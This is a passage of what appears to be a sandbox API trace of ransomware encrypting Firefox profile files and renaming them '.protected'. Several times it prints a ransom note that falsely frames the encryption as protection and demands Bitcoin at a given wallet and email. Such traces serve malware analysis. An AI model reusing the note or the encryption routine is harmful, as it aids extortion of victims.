[0091.010] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.010] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.010] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.010] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\.") returned 101 [0091.010] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.010] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0091.010] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.010] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.010] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.010] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.010] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.010] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\..") returned 102 [0091.010] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.010] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.010] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0091.010] lstrcmpiW (lpString1="webapps.json", lpString2="Windows") returned -1 [0091.010] lstrcmpiW (lpString1="webapps.json", lpString2="Program Files") returned 1 [0091.010] lstrcmpiW (lpString1="webapps.json", lpString2="Program Files (x86)") returned 1 [0091.010] lstrcmpiW (lpString1="webapps.json", lpString2="$Recycle.bin") returned 1 [0091.010] lstrcmpiW (lpString1="webapps.json", lpString2="System Volume Information") returned 1 [0091.010] wnsprintfW (in: pszDest=0x503c40, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json") returned 112 [0091.010] StrStrIW (lpFirst="webapps.json", lpSrch=".protected") returned 0x0 [0091.010] lstrcmpW (lpString1="webapps.json", lpString2="RESTORE_FILES.txt") returned 1 [0091.010] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0091.010] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0091.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0091.011] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json") returned 112 [0091.011] StrStrW (lpFirst="webapps.json", lpSrch=".txt") returned 0x0 [0091.011] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json") returned 112 [0091.011] StrStrW (lpFirst="webapps.json", lpSrch=".rar") returned 0x0 [0091.011] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json") returned 112 [0091.011] StrStrW (lpFirst="webapps.json", lpSrch=".zip") returned 0x0 [0091.011] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | 
out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x2, lpOverlapped=0x0) returned 1 [0091.011] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffffe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.012] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x2, lpOverlapped=0x0) returned 1 [0091.012] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.012] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0091.012] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0091.012] CloseHandle (hObject=0x158) returned 1 [0091.012] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json.protected") returned 122 [0091.012] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json.protected")) 
returned 1 [0091.013] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0091.013] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0091.013] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\RESTORE_FILES.txt") returned 117 [0091.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0091.013] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.013] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0091.014] lstrlenA (lpString="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") returned 684 [0091.014] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0091.014] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.014] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, 
lpOverlapped=0x0) returned 1 [0091.014] CloseHandle (hObject=0x154) returned 1 [0091.014] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0091.014] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="Windows") returned -1 [0091.014] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="Program Files") returned 1 [0091.014] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="Program Files (x86)") returned 1 [0091.014] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="$Recycle.bin") returned 1 [0091.014] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="System Volume Information") returned 1 [0091.014] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite") returned 111 [0091.014] StrStrIW (lpFirst="webappsstore.sqlite", lpSrch=".protected") returned 0x0 [0091.014] lstrcmpW (lpString1="webappsstore.sqlite", lpString2="RESTORE_FILES.txt") returned 1 [0091.014] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0091.014] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0091.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0091.015] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite") returned 111 [0091.015] StrStrW (lpFirst="webappsstore.sqlite", lpSrch=".txt") returned 0x0 [0091.015] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite") returned 111 [0091.015] StrStrW (lpFirst="webappsstore.sqlite", lpSrch=".rar") returned 0x0 [0091.015] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite") returned 111 [0091.015] StrStrW (lpFirst="webappsstore.sqlite", lpSrch=".zip") returned 0x0 [0091.015] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0091.027] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.027] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0091.027] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.027] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0091.027] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0091.028] CloseHandle (hObject=0x154) returned 1 [0091.028] 
wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite.protected") returned 121 [0091.028] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite.protected")) returned 1 [0091.029] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0091.029] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0091.029] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\RESTORE_FILES.txt") returned 109 [0091.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0091.029] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.029] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0091.030] lstrlenA (lpString="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") returned 684 [0091.030] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 
[0091.030] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.030] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0091.030] CloseHandle (hObject=0x150) returned 1 [0091.030] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0091.030] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0091.030] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\RESTORE_FILES.txt") returned 92 [0091.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.031] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.031] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0091.031] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.032] WriteFile (in: hFile=0x14c, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0091.032] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.032] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0091.032] CloseHandle (hObject=0x14c) returned 1 [0091.033] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.033] lstrcmpiW (lpString1="profiles.ini", lpString2="Windows") returned -1 [0091.033] lstrcmpiW (lpString1="profiles.ini", lpString2="Program Files") returned -1 [0091.033] lstrcmpiW (lpString1="profiles.ini", lpString2="Program Files (x86)") returned -1 [0091.033] lstrcmpiW (lpString1="profiles.ini", lpString2="$Recycle.bin") returned 1 [0091.033] lstrcmpiW (lpString1="profiles.ini", lpString2="System Volume Information") returned -1 [0091.033] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 78 [0091.033] StrStrIW (lpFirst="profiles.ini", lpSrch=".protected") returned 0x0 [0091.033] lstrcmpW (lpString1="profiles.ini", lpString2="RESTORE_FILES.txt") returned -1 [0091.033] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0091.033] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0091.033] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.034] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 78 [0091.034] StrStrW (lpFirst="profiles.ini", lpSrch=".txt") returned 0x0 [0091.034] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 78 [0091.034] StrStrW (lpFirst="profiles.ini", lpSrch=".rar") returned 0x0 [0091.034] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 78 [0091.034] StrStrW (lpFirst="profiles.ini", lpSrch=".zip") returned 0x0 [0091.034] ReadFile (in: hFile=0x14c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ea24*=0x6f, lpOverlapped=0x0) returned 1 [0091.035] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffff91, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.035] WriteFile (in: hFile=0x14c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x6f, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ea24*=0x6f, lpOverlapped=0x0) returned 1 [0091.035] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.035] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0091.035] 
WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0091.035] CloseHandle (hObject=0x14c) returned 1 [0091.036] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.protected") returned 88 [0091.036] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini.protected")) returned 1 [0091.037] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0091.037] FindClose (in: hFindFile=0x47ba50 | out: 